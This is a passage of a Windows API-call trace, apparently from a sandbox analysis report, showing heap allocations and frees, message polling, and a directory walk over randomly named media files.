1 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1a70 | out: hHeap=0x2af0000) returned 1 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1890 | out: hHeap=0x2af0000) returned 1 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f18f0 | out: hHeap=0x2af0000) returned 1 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e68 | out: hHeap=0x2af0000) returned 1 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1788 | out: hHeap=0x2af0000) returned 1 [0083.861] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0083.861] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e68 [0083.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1788 [0083.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0083.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1740 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1740 | out: hHeap=0x2af0000) returned 1 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1788 | out: hHeap=0x2af0000) returned 1 [0083.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e68 | out: hHeap=0x2af0000) returned 1 [0083.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0083.861] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e68 [0083.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0083.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1740 [0083.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a6d098 [0083.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69a00 | out: hHeap=0x2af0000) returned 1 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e68 | out: hHeap=0x2af0000) returned 1 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1758 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1740 | out: hHeap=0x2af0000) returned 1 [0083.862] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0083.862] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0083.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0083.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722e8 [0083.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0083.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0083.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1740 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1740 | out: hHeap=0x2af0000) returned 1 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722e8 | out: hHeap=0x2af0000) returned 1 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0083.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0083.863] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a733a8 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eaa80 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1560 | out: hHeap=0x2af0000) returned 1 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a733a8 | out: hHeap=0x2af0000) returned 1 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.863] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72308 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1560 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72308 | out: hHeap=0x2af0000) returned 1 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1560 | out: hHeap=0x2af0000) returned 1 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0083.863] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0083.864] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d898 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d098 | out: hHeap=0x2af0000) returned 1 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1758 | out: hHeap=0x2af0000) returned 1 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.864] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0083.864] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e68 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1560 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0083.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1560 | out: hHeap=0x2af0000) returned 1 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0083.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e68 | out: hHeap=0x2af0000) returned 1 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0083.865] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1560 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e68 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a6d098 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e68 | out: hHeap=0x2af0000) returned 1 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d098 | out: hHeap=0x2af0000) returned 1 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1560 | out: hHeap=0x2af0000) returned 1 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1758 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1758 | out: hHeap=0x2af0000) returned 1 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.866] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0083.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a6d098 [0083.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d898 | out: hHeap=0x2af0000) returned 1 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0083.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0083.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722e8 [0083.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0083.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0083.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0083.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1740 [0083.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721c8 [0083.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721c8 | out: hHeap=0x2af0000) returned 1 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1740 | out: hHeap=0x2af0000) returned 1 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0083.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722e8 | out: hHeap=0x2af0000) returned 1 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1560 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1788 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a738b0 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1788 | out: hHeap=0x2af0000) returned 1 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf0) returned 0x2a683a8 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eaa80 | out: hHeap=0x2af0000) returned 1 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a738b0 | out: hHeap=0x2af0000) returned 1 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1560 | out: hHeap=0x2af0000) returned 1 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1560 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1560 | out: hHeap=0x2af0000) returned 1 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722e8 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1758 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1560 [0083.867] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0083.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0083.868] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0083.868] RtlAllocateHeap 